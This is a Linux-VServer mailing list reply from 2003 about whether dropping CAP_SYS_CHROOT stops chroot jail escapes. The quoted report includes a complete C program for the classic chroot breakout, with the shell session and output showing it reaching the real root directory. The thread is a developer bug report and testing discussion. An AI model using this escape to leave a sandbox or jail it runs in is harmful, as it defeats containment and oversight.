Re: [Vserver] chroot and CAP_SYS_CHROOT broken ??

Thu, 30 Oct 2003 04:35:29 -0800 

On Wed, Oct 29, 2003 at 11:36:42PM -0600, Linas Vepstas wrote:
> 
> Hi,
> 
> I'm having problems testing chroot with chcontext ... it seems broken
> for me.  Maybe I'm doing something wrong.  Anyone know if the following
> should have worked? 
> 
> I assumed that taking away CAP_SYS_CHROOT would not let me 
> break out of chroot jails but it seems that I can break out 
> after all.  I'm gonna try to see if this is a kernel bug
> tommorow ... or if I'm just entertaining false hopes... 

hmm, after --cap '!CAP_SYS_CHROOT', you should not be able
to perform chroot() at all ... and I don't see any reason
why the chroot() in you example should have worked ...

so of course you can break out of a chroot that didn't happen
but what is the point of that?

confused,
Herbert

> The way I understand it, chcontext should have set 'the cap ceiling'
> which means that children cannot inherit anything looser ...
> 
> xx:~/mnt# chcontext --secure --cap '!CAP_SYS_CHROOT' /bin/sh
> New security context is 14
> xx:~/mnt# ps ax 
>   PID TTY      STAT   TIME COMMAND
>     1 ?        S      0:12 init [2]
> 27797 pts/1    S      0:00 /bin/sh
> 27798 pts/1    R      0:00 ps ax
> xx:~/mnt# getpcaps 27797
> Capabilities for `27797': =
> cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_net_bind_service,cap_sys_ptrace,cap_sys_tty_config,cap_lease+ep
> xx:~/mnt# vi c.c
> 
> #include <stdlib.h>
> #include <stdio.h>
> #include <unistd.h>
> #include <sys/stat.h>
> #include <sys/types.h>
> int main(void)
> {
>     char buff [100];
>     int i;
>     // chdir("/root/mnt/breakout");
>     // chroot("/root/mnt/breakout");
> 
>     getcwd(buff, 100);
>     printf ("duude we are in %s\n", buff);
> 
>     mkdir("bust", 0700);
>     chroot("bust");
>     getcwd(buff, 100);
>     printf ("duude we are in %s\n", buff);
>     for (i = 0; i < 10; i++) {
>              chdir("..") ;
> 
>         getcwd(buff, 100);
>          printf ("by bye duude we are in %s\n", buff);
>     }
>     chroot(".");
>     execl("/bin/sh", "/bin/sh",NULL);
> }
> 
> xx:~/mnt# cc -static c.c
> xx:~/mnt# ./a.out
> duude we are in /root/mnt
> duude we are in /root/mnt
> by bye duude we are in /root
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> xx:/# ^D exit
> xx:~/mnt#  mount
> [... stuff deleted ...]
> /root/tmp on /root/mnt type none (rw,bind)
> 
> xx:~/mnt#  cat /proc/version
> 
> Linux version 2.4.22ctx-17c ([EMAIL PROTECTED]) (gcc version 3.3.2
> 20030908 (Debian prerelease)) #3 SMP Fri Oct 24 22:34:38 CDT 2003
> 
> This was a standard Marcello kernel before the ctx-17c patch ... 
> I'm running on i386 arch.
> 
> 
> --linas
> 
> -- 
> pub  1024D/01045933 2001-02-01 Linas Vepstas (Labas!) <[EMAIL PROTECTED]>
> PGP Key fingerprint = 8305 2521 6000 0B5E 8984  3F54 64A9 9A82 0104 5933
> _______________________________________________
> Vserver mailing list
> [EMAIL PROTECTED]
> http://list.linux-vserver.org/mailman/listinfo/vserver
_______________________________________________
Vserver mailing list
[EMAIL PROTECTED]
http://list.linux-vserver.org/mailman/listinfo/vserver

Reply via email to